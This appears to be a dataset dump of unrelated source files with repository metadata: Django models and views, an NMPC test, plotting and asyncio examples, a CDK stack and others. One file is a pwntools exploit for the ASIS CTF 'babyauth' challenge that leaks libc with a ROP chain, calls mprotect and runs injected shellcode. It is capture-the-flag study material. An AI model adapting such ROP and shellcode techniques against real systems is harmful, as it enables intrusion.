assert len(model._NMPC_NAMESPACE.scalar_vars) == 0
for var in model._NMPC_NAMESPACE.deriv_vars:
assert len(var) == len(model._NMPC_NAMESPACE.get_time())
assert var.index_set() is model._NMPC_NAMESPACE.get_time()
for var in model._NMPC_NAMESPACE.alg_vars:
assert len(var) == len(model._NMPC_NAMESPACE.get_time())
assert var.index_set() is model._NMPC_NAMESPACE.get_time()
@pytest.mark.component
def test_constructor_4():
m_plant = make_model(horizon=6, ntfe=60, ntcp=2)
m_controller = make_model(horizon=3, ntfe=30, ntcp=2)
sample_time = 0.5
# Six samples per horizon, five elements per sample
initial_plant_inputs = [m_plant.fs.mixer.S_inlet.flow_vol[0],
m_plant.fs.mixer.E_inlet.flow_vol[0]]
# Fix some derivative vars, as in pseudo-steady state
# Controller model only
for t in m_controller.fs.time:
m_controller.fs.cstr.control_volume.\
energy_accumulation[t, 'aq'].fix(0)
m_controller.fs.cstr.control_volume.\
material_accumulation[t, 'aq', 'E'].fix(0)
m_controller.fs.cstr.control_volume.\
energy_holdup[0, 'aq'].unfix()
m_controller.fs.cstr.control_volume.\
material_holdup[0, 'aq', 'E'].unfix()
m_controller.fs.cstr.control_volume.\
energy_accumulation_disc_eq.deactivate()
m_controller.fs.cstr.control_volume.\
material_accumulation_disc_eq.deactivate()
nmpc = NMPCSim(m_plant.fs, m_plant.fs.time,
m_controller.fs, m_controller.fs.time,
inputs_at_t0=initial_plant_inputs,
solver=solver, outlvl=idaeslog.DEBUG,
sample_time=sample_time)
if __name__ == '__main__':
test_constructor_4()
| [
"KSBeattie@lbl.gov"
] | KSBeattie@lbl.gov |
94857daf8736ce503d5898c9038a404167adde62 | 5d4158f1afa78f0a057c4e78846a918a1d4d3404 | /backend/dating/models.py | a0eec889f555525faa2e5a8a65b4854827a6acdf | [] | no_license | crowdbotics-apps/ayou-20920 | 08c1c10a73a134a53449b8688634564ed5293a21 | 0b51e4eacf271f8a956c530cdad52c57a2fa6f88 | refs/heads/master | 2022-12-18T05:33:07.601092 | 2020-10-01T03:51:32 | 2020-10-01T03:51:32 | 300,129,734 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,637 | py | from django.conf import settings
from django.db import models
class Profile(models.Model):
"Generated Model"
bio = models.TextField()
school = models.TextField()
date_of_birth = models.DateField()
created = models.DateField(
auto_now_add=True,
)
modified = models.DateField(
auto_now=True,
)
user = models.OneToOneField(
"users.User",
null=True,
blank=True,
on_delete=models.CASCADE,
related_name="profile_user",
)
class UserPhoto(models.Model):
"Generated Model"
user = models.ForeignKey(
"users.User",
on_delete=models.CASCADE,
related_name="userphoto_user",
)
photo = models.URLField()
class Setting(models.Model):
"Generated Model"
maximum_distance = models.IntegerField()
gender = models.CharField(
max_length=256,
)
age_range = models.IntegerField()
show_me_on_searches = models.BooleanField()
new_matches_notification = models.BooleanField()
message_notification = models.BooleanField()
message_likes_notification = models.BooleanField()
super_like_notification = models.BooleanField()
in_app_vibrations = models.BooleanField()
user = models.ForeignKey(
"users.User",
null=True,
blank=True,
on_delete=models.CASCADE,
related_name="setting_user",
)
class Dislike(models.Model):
"Generated Model"
owner = models.ForeignKey(
"users.User",
on_delete=models.CASCADE,
related_name="dislike_owner",
)
user = models.ForeignKey(
"users.User",
on_delete=models.CASCADE,
related_name="dislike_user",
)
class Like(models.Model):
"Generated Model"
owner = models.ForeignKey(
"users.User",
on_delete=models.CASCADE,
related_name="like_owner",
)
user = models.ForeignKey(
"users.User",
on_delete=models.CASCADE,
related_name="like_user",
)
super_liked = models.BooleanField()
class Inbox(models.Model):
"Generated Model"
slug = models.SlugField(
max_length=50,
)
created = models.DateTimeField(
auto_now_add=True,
)
class Match(models.Model):
"Generated Model"
user = models.ForeignKey(
"users.User",
on_delete=models.CASCADE,
related_name="match_user",
)
owner = models.ForeignKey(
"users.User",
on_delete=models.CASCADE,
related_name="match_owner",
)
created = models.DateTimeField(
auto_now_add=True,
)
# Create your models here.
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
4b85b79664d408e8e59f8668f2192d221940e4a3 | fcc25875b877510d5603fccfd0b85dbac58fa8d9 | /app/migrations/0003_auto_20170802_1443.py | 07ffea30903d1e974b645322a9555bd034f418b0 | [] | no_license | kmjnhb/repo | be44e0d7a685aae140e581a5b8c0935a8ddf0d7b | ac3cb388f87f2188900beac956dee6c701aaa556 | refs/heads/master | 2021-01-02T08:55:48.242512 | 2017-08-06T19:37:53 | 2017-08-06T19:37:53 | 99,100,726 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 996 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-08-02 14:43
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('app', '0002_auto_20170802_1055'),
]
operations = [
migrations.CreateModel(
name='Manager',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('is_manager', models.BooleanField(default=False)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='client',
name='is_client',
field=models.BooleanField(default=False),
),
]
| [
"you@example.com"
] | you@example.com |
b6fee919c70d1e39c2b3d355b1d28e92deee5f0f | 4538a25701f9f108278036ab520a81dcb0de15fe | /non-euclidean/poincare_disk.py | 3b4db43c4f79cbcb2967125f2771ddae7b9111fc | [
"MIT"
] | permissive | foamliu/Complex-Analysis | daef349ddf5ad8f8037fb026d4eab35d4a3192c8 | 6389c69dad680015cb7fa5fe9789793638ccddd0 | refs/heads/master | 2020-05-09T21:00:24.454517 | 2019-05-28T09:37:17 | 2019-05-28T09:37:17 | 181,427,148 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 601 | py | import matplotlib.pyplot as plt
import numpy as np
u = np.linspace(-1, 1, 200)
v = np.linspace(0, 3, 360)
uu, vv = np.meshgrid(u, v)
z0 = uu + 1j * vv
z = (1j * z0 + 1) / (z0 + 1j)
T = np.arctan2(uu, vv)
plt.figure(figsize=(14, 6))
plt.subplot(1, 2, 1)
plt.scatter(uu, vv, c=T, s=10, lw=0, cmap='hsv')
plt.title('real points')
plt.xlabel('Re(z)')
plt.ylabel('Im(z)')
plt.axis('equal')
plt.grid(True)
plt.subplot(1, 2, 2)
plt.scatter(np.real(z), np.imag(z), c=T, s=10, lw=0, cmap='hsv')
plt.title('poincare disk')
plt.xlabel('Re(z)')
plt.ylabel('Im(z)')
plt.axis('equal')
plt.grid(True)
plt.show()
| [
"foamliu@yeah.net"
] | foamliu@yeah.net |
fd8db4fd2ea2cced67e397b5060fe198e20fc74a | 97326c2dcdcc9ef8232d99e4445a1cc6a37aec22 | /docs/conditionals/example-6.py | bfb84e4bbe26d99c2358aba5838785b36a1e70e8 | [] | no_license | Barnsa/programming-resources | 8e1c043106089f10553eb8f303486905c7215c77 | 1ad0483a0f964f36fe65fda2d614c2782e0f1ed1 | refs/heads/master | 2022-11-17T17:06:56.736072 | 2020-07-21T13:06:52 | 2020-07-21T13:06:52 | 266,988,442 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 478 | py | # example-6.py
# examples of exotic literals at work
string_literals = "string"
integer_literals = 12
octal_literals = 0o11
hexadecimal_literals = 0x123
set_literals = {2, 4, 7}
complex_literals = 12J
unicode_literals = u"string"
byte_code_literals = b"string"
print(
string_literals,
integer_literals,
octal_literals,
hexadecimal_literals,
set_literals,
complex_literals,
unicode_literals,
byte_code_literals
) | [
"barnsa@uni.coventry.ac.uk"
] | barnsa@uni.coventry.ac.uk |
fcd354527ad7264d9770ddd8aa6d4c00fc4838c0 | 3fcd2c184abaa9bef5f4a916fbf0e9587da06346 | /IO/Asynchronous/Asyncio/aio_http.py | 7334a8e74fea9ff2ad791431ca5cf882865cab4a | [] | no_license | chinitacode/Python_Learning | 865ff42722e256776ae91d744b779fa476e23f45 | 49aa02367e3097aca107b70dab43b5f60a67ef9f | refs/heads/master | 2020-06-29T01:05:39.331297 | 2020-03-21T14:29:51 | 2020-03-21T14:29:51 | 200,393,997 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 509 | py | import asyncio,aiohttp
async def fetch_async(url):
print(url)
async with aiohttp.request("GET",url) as r:
reponse = await r.text(encoding="utf-8")
#或者直接await r.read()不编码,直接读取,适合于图像等无法编码文件
print(reponse)
tasks = [fetch_async('http://www.baidu.com/'), fetch_async('http://www.chouti.com/')]
event_loop = asyncio.get_event_loop()
results = event_loop.run_until_complete(asyncio.gather(*tasks))
event_loop.close()
| [
"ziyu_zhou_victoria@163.com"
] | ziyu_zhou_victoria@163.com |
c841438efbd14ab47aef4d8d1813c0b63f7c73b0 | 3546dd5dbcffc8509440c820faa7cf28080c5df7 | /python35/Lib/site-packages/win32comext/axscript/client/pydumper.py | a4a3a5941321bfaad120bfa5bedbefa34bfa6bae | [
"Apache-2.0",
"MIT",
"BSD-3-Clause",
"LGPL-2.1-only"
] | permissive | Matchoc/python_env | 55ad609c8270cc6148eda22d37f36709d73b3652 | 859d84d1717a265a4085ad29706b12c19c62d36f | refs/heads/master | 2022-02-13T11:05:51.825544 | 2020-06-05T02:42:08 | 2020-06-05T02:42:08 | 75,793,921 | 0 | 1 | Apache-2.0 | 2018-12-14T07:30:28 | 2016-12-07T03:06:13 | Python | UTF-8 | Python | false | false | 2,204 | py | # pydumper.py
#
# This is being worked on - it does not yet work at all, in ay way
# shape or form :-)
#
# A new script engine, derived from the standard scripting engine,
# which dumps information.
# This generally can be used to grab all sorts of useful details about
# an engine - expose bugs in it or Python, dump the object model, etc.
# As it is derived from the standard engine, it fully supports Python
# as a scripting language - meaning the dumps produced can be quite dynamic,
# and based on the script code you execute.
from . import pyscript
from win32com.axscript import axscript
from .pyscript import RaiseAssert, trace, Exception, SCRIPTTEXT_FORCEEXECUTION
PyDump_CLSID = '{ac527e60-c693-11d0-9c25-00aa00125a98}'
class AXScriptAttribute(pyscript.AXScriptAttribute):
pass
class NamedScriptAttribute(pyscript.NamedScriptAttribute):
pass
class PyScript(pyscript.PyScript):
pass
def Register():
import sys
if '-d' in sys.argv:
dispatcher = "DispatcherWin32trace"
debug_desc = " ("+dispatcher+")"
debug_option = "Yes"
else:
dispatcher = None
debug_desc = ""
debug_option = ""
categories = [axscript.CATID_ActiveScript,axscript.CATID_ActiveScriptParse]
clsid = PyDump_CLSID
lcid = 0x0409 # // english
policy = None # "win32com.axscript.client.axspolicy.AXScriptPolicy"
print("Registering COM server%s..." % debug_desc)
from win32com.server.register import RegisterServer
languageName = "PyDump"
verProgId = "Python.Dumper.1"
RegisterServer(clsid = clsid, pythonInstString = "win32com.axscript.client.pyscript.PyDumper",
className = "Python Debugging/Dumping ActiveX Scripting Engine",
progID = languageName, verProgID = verProgId,
catids = categories,
policy=policy, dispatcher = dispatcher)
CreateRegKey(languageName + "\\OLEScript")
# Basic Registration for wsh.
win32com.server.register._set_string(".pysDump", "pysDumpFile")
win32com.server.register._set_string("pysDumpFile\\ScriptEngine", languageName)
print("Dumping Server registered.")
if __name__=='__main__':
Register()
| [
"matchoc@hotmail.com"
] | matchoc@hotmail.com |
078cbf9ece2db7c8b5f1892f5fcbb5f78c300ffa | fe8fa8bf7273a7894f91f5027880164358047e85 | /shop/models.py | b673dfc67bb0d074ce0066def6e818b5590979ea | [
"MIT"
] | permissive | urosjevremovic/online-shop | 7935be8947ebaa4f44c28dae6ed0b895c89fcd0e | 39328da7438852206a355df5a4ae6c8aa90c186b | refs/heads/master | 2020-03-23T16:42:25.248301 | 2018-07-25T15:07:35 | 2018-07-25T15:07:35 | 141,823,951 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,363 | py | from django.db import models
from django.urls import reverse
class Category(models.Model):
name = models.CharField(max_length=120, db_index=True)
slug = models.CharField(max_length=120, unique=True)
class Meta:
ordering = ('-name', )
verbose_name = 'category'
verbose_name_plural = 'categories'
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('shop:product_list_by_category', args=[self.slug])
class Product(models.Model):
category = models.ForeignKey(Category, related_name='product', on_delete=models.CASCADE)
name = models.CharField(max_length=200, db_index=True)
slug = models.CharField(max_length=200, db_index=True)
image = models.ImageField(upload_to='product/%Y/%m/%d', blank=True)
description = models.TextField(blank=True)
price = models.DecimalField(max_digits=10, decimal_places=2)
stock = models.IntegerField(default=20)
available = models.BooleanField(default=True)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-name', )
index_together = (('id', 'slug'), )
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('shop:product_detail', args=[self.id, self.slug])
| [
"jevremovic.uros91@gmail.com"
] | jevremovic.uros91@gmail.com |
eb0d0e43a90927231bac66479c5d230cec59cd25 | 29e2afe487acefdc17ae4b16def495632d479be3 | /morpfw/crud/__init__.py | d38eadc21aafd253567055f77b655f7f0266a68c | [] | no_license | brainysmurf/morpfw | fd2a40b660bef00b9cc0a142cbfdcb8d37620f2b | a8d5e3fa57a8d66b61840f113ba54f6c1fcf60d0 | refs/heads/master | 2020-04-10T08:26:20.123425 | 2018-12-07T09:59:43 | 2018-12-07T09:59:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,510 | py | import morepath
from .app import App
from . import subscribers
from .app import Session
import argparse
import yaml
import sqlalchemy
import os
from .model import Collection, Model
from .rulesadapter import Adapter
from .schema import Schema
from .model import StateMachine
from .util import resolve_model
from .app import App
from .storage.sqlstorage import SQLStorage
from zope.sqlalchemy import register as register_session
def run():
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--settings', default='settings.yml')
args = parser.parse_args()
with open(args.settings) as cf:
settings = yaml.load(cf)
application = create_app(App, settings)
# start app
morepath.run(application)
def create_app(app, settings, sqlalchemy_session=Session,
sqlalchemy_bases=None):
sqlalchemy_bases = sqlalchemy_bases or []
register_session(sqlalchemy_session)
# initialize SQLAlchemy
if 'sqlalchemy' in settings:
cwd = os.getcwd()
engine = sqlalchemy.create_engine(
settings['sqlalchemy']['dburi'] % {'here': cwd})
sqlalchemy_session.configure(bind=engine)
# initialize app
app.init_settings(settings)
morepath.commit(app)
morepath.autoscan()
app.commit()
application = app()
# create tables
if 'sqlalchemy' in settings:
for base in sqlalchemy_bases:
base.metadata.create_all(engine)
return application
if __name__ == '__main__':
run()
| [
"kagesenshi.87@gmail.com"
] | kagesenshi.87@gmail.com |
dde7bfd72a9c08bfffad33758d1137ddd7fa93d0 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_53/501.py | a8f69f0a69a63542706fc8e3cfa8c19f65f8686a | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 286 | py | # -*- coding: utf-8 -*-
import sys
fin = sys.stdin
T = int(fin.readline())
for case in range(1,T+1):
(N,k) = map(int, fin.readline().split())
m = pow(2,N)
#print m
if (k+1) % m == 0:
print "Case #%d: ON" % (case)
else:
print "Case #%d: OFF" % (case)
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
41106cde601cc1c35e636198ff7b8dd1a03de755 | 09f8a3825c5109a6cec94ae34ea17d9ace66f381 | /cohesity_management_sdk/models/couchbase_cluster.py | bfa8f347c5dc05f02dbd954e2bd179bc7848972b | [
"Apache-2.0"
] | permissive | cohesity/management-sdk-python | 103ee07b2f047da69d7b1edfae39d218295d1747 | e4973dfeb836266904d0369ea845513c7acf261e | refs/heads/master | 2023-08-04T06:30:37.551358 | 2023-07-19T12:02:12 | 2023-07-19T12:02:12 | 134,367,879 | 24 | 20 | Apache-2.0 | 2023-08-31T04:37:28 | 2018-05-22T06:04:19 | Python | UTF-8 | Python | false | false | 1,325 | py | # -*- coding: utf-8 -*-
# Copyright 2023 Cohesity Inc.
class CouchbaseCluster(object):
"""Implementation of the 'CouchbaseCluster' model.
Specifies an Object containing information about a couchbase cluster.
Attributes:
seeds (list of string): Seeds of this Couchbase Cluster.
"""
# Create a mapping from Model property names to API property names
_names = {
"seeds":'seeds',
}
def __init__(self,
seeds=None,
):
"""Constructor for the CouchbaseCluster class"""
# Initialize members of the class
self.seeds = seeds
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
seeds = dictionary.get("seeds")
# Return an object of this model
return cls(
seeds
) | [
"naveena.maplelabs@cohesity.com"
] | naveena.maplelabs@cohesity.com |
c7c44980d93edb211bcc3294467a393395be5804 | f4912e5b302f9a9fe013a7ddefe18a599fd1715d | /app_stacks/vpc_stack.py | a595a79091241b7a77efb093e5fcf86043fcc5b0 | [] | no_license | miztiik/xray-lambda-profiler | 5c49d9e4ffcd116fc76f9a7cf5c4c7e0ea9cc45a | 5f7add49d832899e01dd54b72c1478efa9f6853f | refs/heads/master | 2021-04-11T17:07:45.722949 | 2020-08-30T13:06:14 | 2020-08-30T13:06:14 | 249,039,624 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,634 | py | from aws_cdk import aws_ec2 as _ec2
from aws_cdk import core
class global_args:
'''
Helper to define global statics
'''
OWNER = 'MystiqueAutomation'
ENVIRONMENT = 'production'
REPO_NAME = 'xray-lambda-profiler'
SOURCE_INFO = f'https://github.com/miztiik/{REPO_NAME}'
VERSION = '2020_03_21'
class VpcStack(core.Stack):
def __init__(self, scope: core.Construct, id: str, from_vpc_name=None, ** kwargs) -> None:
super().__init__(scope, id, **kwargs)
if from_vpc_name is not None:
self.vpc = _ec2.Vpc.from_lookup(
self, "vpc",
vpc_name=from_vpc_name
)
else:
self.vpc = _ec2.Vpc(
self,
"miztVpc",
cidr="10.10.0.0/16",
max_azs=2,
nat_gateways=0,
subnet_configuration=[
_ec2.SubnetConfiguration(
name="public", cidr_mask=24, subnet_type=_ec2.SubnetType.PUBLIC
),
# _ec2.SubnetConfiguration(
# name="app", cidr_mask=24, subnet_type=_ec2.SubnetType.PRIVATE
# ),
_ec2.SubnetConfiguration(
name="db", cidr_mask=24, subnet_type=_ec2.SubnetType.ISOLATED
)
]
)
output_0 = core.CfnOutput(
self,
"AutomationFrom",
value=f"{global_args.SOURCE_INFO}",
description="To know more about this automation stack, check out our github page."
)
| [
"13oct08@quantumfoam.uni.cc"
] | 13oct08@quantumfoam.uni.cc |
c5356e8a8533dcf0eb957bc66cfbfc82385a9321 | 05b418ec539a1df81e7b356cac33bb96fcb26b5c | /CroPy/plants.py | 127d89b3147314a4d622f55c51df5aeea8c27ac3 | [] | no_license | rjcmarkelz/CroPy | 7aff37797936b9ca676facbe9eb3bd7ea6443c09 | cc18da80ea3431783b074053f3183debc31043ba | refs/heads/master | 2021-01-10T05:10:10.677352 | 2016-01-04T05:33:34 | 2016-01-04T05:33:34 | 46,379,438 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,377 | py | class Plant(object):
def __init__(self):
self._observers = []
def attach(self, observer):
if observer not in self._observers:
self._observers.append(observer)
def notify(self, modifier=None):
for observer in self._observers:
if modifier != observer:
observer.update(self)
class Organ(Plant):
def __init__(self, name=''):
Plant.__init__(self)
self.name = name
self._carbon = 10
self._length = 10
self._photo = 3
@property
def carbon(self):
return self._carbon
@carbon.setter
def carbon(self, value):
self._carbon = value
self.notify()
@property
def length(self):
return self._length
@length.setter
def length(self, value):
self._length = value
self.notify()
@property
def photo(self):
return self._photo
@photo.setter
def photo(self, value):
self._photo = value
self.notify()
class CarbView:
def __init__(self, name=''):
self.name = name
def update(self, plant):
print('%s has %d carbon' % (plant.name, plant.carbon))
print('%s has %d length' % (plant.name, plant.length))
print('%s has %d photo' % (plant.name, plant.photo))
print(plant.length*plant.photo)
| [
"rjmarkelz@ucdavis.edu"
] | rjmarkelz@ucdavis.edu |
cf95d8797fffba43060c2f90f9dc5f76f00f38e7 | b07a69b7a82f4bd22501908501b4b6ff3c1f2a94 | /week15_and_onwards/MySite/mysite/mysite/views.py | 16156c186c2c57064ddb40e566f3e00ad26b857f | [] | no_license | PetosPy/hackbulgaria_python | 8c1103ceefc4f832c42996a86fb351bfc951797c | d7212f35cd448e55009141bd6e42b55f7f05779b | refs/heads/master | 2023-02-28T16:40:22.828545 | 2017-02-15T15:06:28 | 2017-02-15T15:06:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,694 | py | from math import factorial
from django.shortcuts import render, redirect
from django.http import HttpRequest, HttpResponse
from mysite.utils.rle_compressor import compress, decompress
from mysite.utils.calculator import get_nth_fibonacci_numbers, get_nth_prime_numbers, gen_primes
def get_index(request):
return render(request, 'index.html', request.session)
# @/calculateNFactorial
def calc_n_factorial(request: HttpRequest):
n = request.POST.get('n_fac', '')
try:
n = int(n)
request.session['wanted_n_fac'] = n
request.session['n_factorial'] = factorial(n)
except ValueError:
request.session['error_msg'] = 'The input must be a valid integer!'
return redirect('index')
# @/calculateNthFibonacci
def calc_nth_fibonacci_numbers(request: HttpRequest):
""" Calculate the fibonacci numbers up to n"""
n = request.POST.get('n_fib', '')
try:
n = int(n)
if n <= 0:
request.session['error_msg'] = 'The input must be a positive integer!'
return redirect('index')
request.session['wanted_n_fibonaccis'] = n
request.session['fibonaccis'] = get_nth_fibonacci_numbers(n)
except ValueError:
request.session['error_msg'] = 'The input must be a valid integer!'
return redirect('index')
# @/calculateNthPrimes
def calc_nth_primes(request: HttpResponse):
""" Calculate the first N prime numbers """
n = request.POST.get('n_primes', '')
try:
n = int(n)
if n > 1000 or n < 1:
request.session['error_msg'] = 'The input must be between 1 and 1000!'
return redirect('index')
request.session['wanted_n_primes'] = n
request.session['primes'] = get_nth_prime_numbers(n)
except ValueError:
request.session['error_msg'] = 'The input must be a valid integer!'
return redirect('index')
# @/encodeRL
def encode_rl(request: HttpResponse):
string = request.POST.get('str_to_encode', '')
try:
encoded_str = compress(string)
except ValueError as e:
request.session['error_msg'] = str(e)
return redirect('index')
request.session['wanted_enc_str'] = string
request.session['encoded_str'] = encoded_str
return redirect('index')
# @/decodeRL
def decode_rl(request: HttpResponse):
encoded_string = request.POST.get('str_to_decode', '')
try:
decoded_str = decompress(encoded_string)
except ValueError as e:
request.session['error_msg'] = str(e)
return redirect('index')
request.session['wanted_dec_str'] = encoded_string
request.session['decoded_str'] = decoded_str
return redirect('index')
| [
"familyguyuser192@windowslive.com"
] | familyguyuser192@windowslive.com |
8c61aacae9721743fc2841b847755e4a17fce0e8 | fbde0e2a0c93193949db891b6633a5f61ad9f61b | /backend/home/migrations/0001_load_initial_data.py | 99c69f7d511bef2f5fc5e145ed104df74edc71db | [] | no_license | crowdbotics-apps/test-26691 | 7198419c0a613e6702c71cb568ce3bbf737d33aa | 4a6756c674919dd695b059594726f2093627f0f8 | refs/heads/master | 2023-04-20T17:56:38.407147 | 2021-05-14T12:02:01 | 2021-05-14T12:02:01 | 367,349,252 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 526 | py | from django.db import migrations
def create_site(apps, schema_editor):
Site = apps.get_model("sites", "Site")
custom_domain = "test-26691.botics.co"
site_params = {
"name": "test",
}
if custom_domain:
site_params["domain"] = custom_domain
Site.objects.update_or_create(defaults=site_params, id=1)
class Migration(migrations.Migration):
dependencies = [
("sites", "0002_alter_domain_unique"),
]
operations = [
migrations.RunPython(create_site),
]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
014cf8b22ad535325e225718a87d99269363befe | d51b4c766661af65b4ee6e7c30f8cb4bdd8603e3 | /python/algorithm/leetcode/49.py | d9f5c2be72952c7ae5dda1bf600f8c4d534d1acc | [] | no_license | yanxurui/keepcoding | 3e988c76b123d55b32cf7cc35fbffb12c4ccb095 | d6b9f07e2d1437681fa77fee0687ea9b83cab135 | refs/heads/master | 2021-01-24T09:01:41.306597 | 2020-05-21T05:36:04 | 2020-05-21T05:36:04 | 93,400,267 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 961 | py | from collections import defaultdict
class Solution(object):
def groupAnagrams(self, strs):
"""
:type strs: List[str]
:rtype: List[List[str]]
"""
ans = defaultdict(list)
for w in strs:
ans[''.join(sorted(w))].append(w)
return list(ans.values())
if __name__ == '__main__':
from testfunc import test
def sort_nest(L):
for i in range(len(L)):
if isinstance(L[i], list):
L[i] = sort_nest(L[i])
return sorted(L)
def compare(a, b):
'''compare 2 unordered nested list
'''
return len(a) == len(b) and sort_nest(a) == sort_nest(b)
test_data = [
(
["eat", "tea", "tan", "ate", "nat", "bat"],
[
["ate","eat","tea"],
["nat","tan"],
["bat"]
]
)
]
test(Solution().groupAnagrams, test_data, compare=compare)
| [
"617080352@qq.com"
] | 617080352@qq.com |
51b676bf10693d8682cd739f5ef4b22908e3fe8a | a140b1c2cfcc4d9fe7d4a9fcd51f86bf8d89e41c | /2020.12.11-ASIS_CTF_Finals_2020/babyauth/v00-shellcode.py | 050b95f05ac57989f98ded6682c22009c8eb7789 | [] | no_license | xcode2010/ctf | 6f0e6f76e7cdbe44842576ec49dbbffe0de91a49 | 2c121f1e1171ff0f42a4edfb7a17261cc673adb5 | refs/heads/master | 2023-03-28T07:34:33.695719 | 2021-03-21T17:38:55 | 2021-03-21T18:23:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,121 | py | #!/usr/bin/env python3
from pwn import *
PERCENT_S_NEWLINE = 0x4019c8
POP_RSI_RET = 0x4017fa
POP_RDI_RET = 0x4019a3
PRINTF_CHK_GOT = 0x603090
RET = 0x401545
USERNAME_READER = 0x4014c0
PRINTF_CHK_LIBC = 0x131040
MPROTECT_LIBC = 0x11bb00
WORK_PAGE = 0x603000
WORK_ADDR = 0x603150
WORK_SIZE = 0xeb0
PAGE_SIZE = 0x1000
POP_RSP_RET = 0x401063
MOV_RDI_R12_CALL_RBP = 0x40183c
POP_RBP_RET = 0x400f08
READ_LIBC = 0x111130
context.arch = 'amd64'
STAGE3 = asm(r'''
mov rax, 1
mov rdi, 1
lea rsi, [.str + rip]
mov rdx, .str_end - .str
syscall
.str:
.asciz "hello from asm\n"
.str_end:
''')
def connect():
if args.LOCAL:
return process(['./server.py'])
else:
return remote('69.90.132.134', 3317)
def scanf_ok(x):
# https://reverseengineering.stackexchange.com/a/10596
return b'\x09' not in x and \
b'\x0a' not in x and \
b'\x0b' not in x and \
b'\x0c' not in x and \
b'\x0d' not in x and \
b'\x20' not in x
def send_stage1(tube):
tube.recvuntil(b'Username: ')
payload = flat({
0: b'admin\0',
0x38: b''.join((
struct.pack('<QQ', POP_RDI_RET, 1),
struct.pack('<QQ', POP_RSI_RET, PERCENT_S_NEWLINE),
# pop rdx; mov eax, 1; pop rbx; pop rbp; retn
struct.pack('<QQQQ', 0x400e8f, PRINTF_CHK_GOT, 0, 0),
# call ___printf_chk; pop rdx; mov eax, 1; pop rbx; pop rbp; retn
struct.pack('<QQQQ', 0x400e8a, 0, 0, 0),
# it just so happens that r12 == IPC *, so we can restart
struct.pack('<QQ', POP_RBP_RET, USERNAME_READER),
struct.pack('<Q', MOV_RDI_R12_CALL_RBP),
)),
})
assert scanf_ok(payload), payload.hex()
# input('stage1')
tube.sendline(payload)
printf_chk, = struct.unpack('<Q', tube.recvn(6).ljust(8, b'\x00'))
libc = printf_chk - PRINTF_CHK_LIBC
print(f'libc: 0x{libc:x}')
assert libc & 0xfff == 0
return libc
def send_stage2(tube, libc):
tube.recvuntil(b'Username: ')
payload = flat({
0: b'admin\0',
0x38: b''.join((
struct.pack('<QQ', POP_RDI_RET, WORK_PAGE),
struct.pack('<QQ', POP_RSI_RET, PAGE_SIZE),
# pop rdx; mov eax, 1; pop rbx; pop rbp; retn
struct.pack('<QQQQ', 0x400e8f, 0x7, 0, 0),
struct.pack('<Q', libc + MPROTECT_LIBC),
struct.pack('<QQ', POP_RDI_RET, 0),
struct.pack('<QQ', POP_RSI_RET, WORK_ADDR),
# pop rdx; mov eax, 1; pop rbx; pop rbp; retn
struct.pack('<QQQQ', 0x400e8f, WORK_SIZE, 0, 0),
struct.pack('<Q', RET),
struct.pack('<Q', libc + READ_LIBC),
struct.pack('<Q', RET),
struct.pack('<Q', WORK_ADDR),
))
})
assert scanf_ok(payload)
# input('stage2')
tube.sendline(payload)
def pwn_once(tube):
libc = send_stage1(tube)
send_stage2(tube, libc)
# input('stage3')
tube.send(STAGE3)
def main():
with connect() as tube:
pwn_once(tube)
tube.interactive()
if __name__ == '__main__':
main()
| [
"mephi42@gmail.com"
] | mephi42@gmail.com |
60bd221d9a7201ed61317b388cf986a9fd6e682d | 8eeb9db7f4bc986a8b24c09b8af1ce10dd97689e | /posts/models.py | 4f07bafa70e93300ec6e92397229f9351b72512c | [] | no_license | jotasic/wecode_wanted | e21a400b6582ae8a5b5af7f8242f67575dc91b74 | e291513d8e6353ad6318d0894cf8f78d07d084a7 | refs/heads/main | 2023-08-29T01:36:44.595014 | 2021-10-22T02:39:20 | 2021-10-22T02:39:20 | 418,725,436 | 0 | 0 | null | 2021-10-22T02:45:28 | 2021-10-19T01:20:52 | Python | UTF-8 | Python | false | false | 430 | py | from django.db import models
from django.conf import settings
class Post(models.Model):
author = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, null=True)
title = models.CharField(max_length=255)
content = models.TextField()
created_at = models.DateTimeField(auto_now_add=True)
